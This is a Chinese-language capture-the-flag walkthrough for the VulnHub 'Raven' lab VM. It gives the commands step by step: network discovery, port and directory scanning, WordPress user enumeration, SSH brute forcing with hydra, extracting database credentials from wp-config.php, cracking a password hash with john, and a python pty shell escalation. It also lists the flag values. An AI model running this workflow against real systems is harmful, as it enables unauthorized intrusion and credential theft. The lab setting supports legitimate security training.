主机来源:www.vulnhub.com
下载地址:https://download.vulnhub.com/raven/Raven.ova
用到的知识点:
wpscan漏扫
hydra暴破
john解密
python提权
发现IP
安装成功后,查找此虚拟机的IP,我使用的是netdiscover
netdiscover -i eth0 -r 10.0.3.1/24
发现IP:10.0.3.140
nmap
nmap -sV -p- 10.0.3.140
发现80端口是开的,去看一下
最终在service.html下的源代码中找到了flag1
flag1{b9bbcb33e11b80be759c4e844862482d}
发现页面没有什么功能之后我们扫下目录
dirb
dirb http://10.0.3.140
别的先不管,我们发现了wordpress
wpscan
那就不管三七二十一,先扫一遍再说
wpscan --url http://10.0.3.140/wordpress --wp-content-dir -ep -et -eu
找到两个用户名
尝试暴破一下,用这个字典,一般这个目录下的rockyou是压缩文件,自己解压下就好了
hydra
hydra -l michael -P rockyou.txt ssh://10.0.3.140
这里也可以-L 把这两个用户名都加进去,我这里上帝视角一下,只有michael才能暴破出来。
ssh登录一下
找到flag2
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
然后找到/var/www/html/wordpress/wp-config.php,获得数据库账号密码
登录数据库。
在表wp_posts中获得flag3和flag4。
flag3{afc01ab56b50591e7dccf93122770cd2}
flag4{715dea6c055b9fe3337544932f2941ce}
获得了steven的密码
解一下
$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
用john,直接john 文件名
然后用steven的账号登录,登录成功
可以用python提权
python -c 'import pty;pty.spawn("/bin/sh")'